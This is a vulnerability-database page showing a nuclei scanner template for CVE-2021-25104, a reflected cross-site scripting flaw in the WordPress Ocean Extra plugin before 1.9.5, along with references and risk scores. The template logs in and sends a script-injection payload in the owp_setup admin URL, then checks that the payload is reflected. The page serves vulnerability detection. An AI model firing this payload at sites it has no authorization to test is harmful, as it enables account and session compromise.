Lucene search
K

WordPress Ocean Extra <1.9.5 - Cross-Site Scripting

🗓️ 07 Jul 2026 16:50:48Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 33 Views

WordPress Ocean Extra <1.9.5 - Cross-Site Scripting vulnerabilit

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress plugin Ocean Extra 跨站脚本漏洞
20 Jun 202200:00
cnnvd
CNVD
WordPress Ocean Extra plugin跨站脚本漏洞
22 Jun 202200:00
cnvd
CVE
CVE-2021-25104
20 Jun 202210:25
cve
Cvelist
CVE-2021-25104 Ocean Extra < 1.9.5 - Reflected Cross-Site Scripting
20 Jun 202210:25
cvelist
EUVD
EUVD-2021-12016
7 Oct 202500:30
euvd
NVD
CVE-2021-25104
20 Jun 202211:15
nvd
OpenVAS
WordPress Ocean Extra Plugin < 1.9.5 XSS Vulnerability
7 Nov 202200:00
openvas
OSV
CVE-2021-25104
20 Jun 202211:15
osv
Patchstack
WordPress Ocean Extra plugin <= 1.9.4 - Reflected Cross-Site Scripting (XSS) vulnerability
24 May 202200:00
patchstack
Prion
Cross site scripting
20 Jun 202211:15
prion
Rows per page
id: CVE-2021-25104

info:
  name: WordPress Ocean Extra <1.9.5 - Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: WordPress Ocean Extra plugin before 1.9.5 contains a cross-site scripting vulnerability. The plugin does not escape generated links which are then used when the OceanWP theme is active.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
  remediation: Fixed in version 1.9.5.
  reference:
    - https://wpscan.com/vulnerability/2ee6f1d8-3803-42f6-9193-3dd8f416b558
    - https://wordpress.org/plugins/ocean-extra/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-25104
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-25104
    cwe-id: CWE-79
    epss-score: 0.01355
    epss-percentile: 0.68264
    cpe: cpe:2.3:a:oceanwp:ocean_extra:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: oceanwp
    product: ocean_extra
    framework: wordpress
  tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated,wpscan,wp,ocean-extra,oceanwp,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        GET /wp-admin/?step=demo&page=owp_setup&a"><script>alert(/XSS/)</script>   HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'OceanWP'
          - '><script>alert(/XSS/)</script>'
        condition: and

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402201fcd67c20bc98d79ad5357247df24c02dcc84165a13a7c0226c0c77e5c4eecbc0220522bbc2737bcfd1d729396b2b8cbab96a9e8aafe9921b10e7f34febbbfd76522:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.3Medium risk
Vulners AI Score6.3
CVSS 24.3
CVSS 3.16.1
EPSS0.01388
33